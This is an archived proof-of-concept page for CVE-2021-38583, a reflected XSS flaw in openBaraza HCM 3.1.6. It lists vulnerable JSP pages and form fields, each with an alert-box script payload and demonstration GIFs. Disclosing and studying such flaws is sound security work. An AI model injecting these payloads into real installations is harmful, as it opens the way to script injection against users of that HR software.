Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-38583 PoC — openBaraza HCM 跨站脚本漏洞

Source
Associated Vulnerability
Title:openBaraza HCM 跨站脚本漏洞 (CVE-2021-38583)
Description:openBaraza HCM是一个全面的人力资源和人才管理软件解决方案,不仅包含传统的核心人力资源功能,还包含人才管理的关键方面。 openBaraza HCM 3.1.6 版本存在安全漏洞,该漏洞源于没有正确地中和用户可控制的输入,这允许在多个页面上反射跨站点脚本(XSS)
Readme
# CVE-2021-38583 openBaraza HCM HR Payroll v.3.1.6 Reflected XSS vulnerability

openBaraza HCM HR Payroll v.3.1.6 does not properly neutralize user-controllable input, which allows reflected cross-site scripting (XSS) vulnerability on multiple pages. 

https://openbaraza.org

https://sourceforge.net/projects/obhrms/?source=directory


### Vulnerable pages:
---

http://serverip:9090/hr/subscription.jsp

affected: "number_of_employees" text box

payload: <script>alert('XSS')</script>

![subscription.jsp](https://raw.githubusercontent.com/charlesbickel/CVE-2021-38583/main/2021-08-11_11-57-29.gif)

---

http://serverip:9090/hr/application.jsp

affected: "surname", "first_name", "middle_name", "applicant_email", "phoneapplicant_phone", "identity_card", "language" text boxes

payload: <script>alert('XSS')</script>

![application.jsp](https://raw.githubusercontent.com/charlesbickel/CVE-2021-38583/main/2021-08-11_11-30-38.gif)

---

http://serverip:9090/hr/index.jsp?view=10:0:0&data=9

affected: "previous_salary", "expected_salary" text boxes

payload: <script>alert('XSS')</script>

![index.jsp?view=10:0:0&data=9](https://raw.githubusercontent.com/charlesbickel/CVE-2021-38583/main/2021-08-10_11-19-01.gif)

---

http://serverip:9090/hr/index.jsp?view=44:0:3&data={new}

affected: "self_rating" text box

payload: <script>alert('XSS')</script>

![index.jsp?view=44:0:3&data={new}](https://raw.githubusercontent.com/charlesbickel/CVE-2021-38583/main/2021-08-12_08-46-01.gif)
File Snapshot

[4.0K] /data/pocs/f052239a9faadfe06949ed7ccaf063422798a16b ├── [830K] 2021-08-10_11-19-01.gif ├── [852K] 2021-08-11_11-30-38.gif ├── [411K] 2021-08-11_11-57-29.gif ├── [307K] 2021-08-12_08-46-01.gif └── [1.4K] README.md 0 directories, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.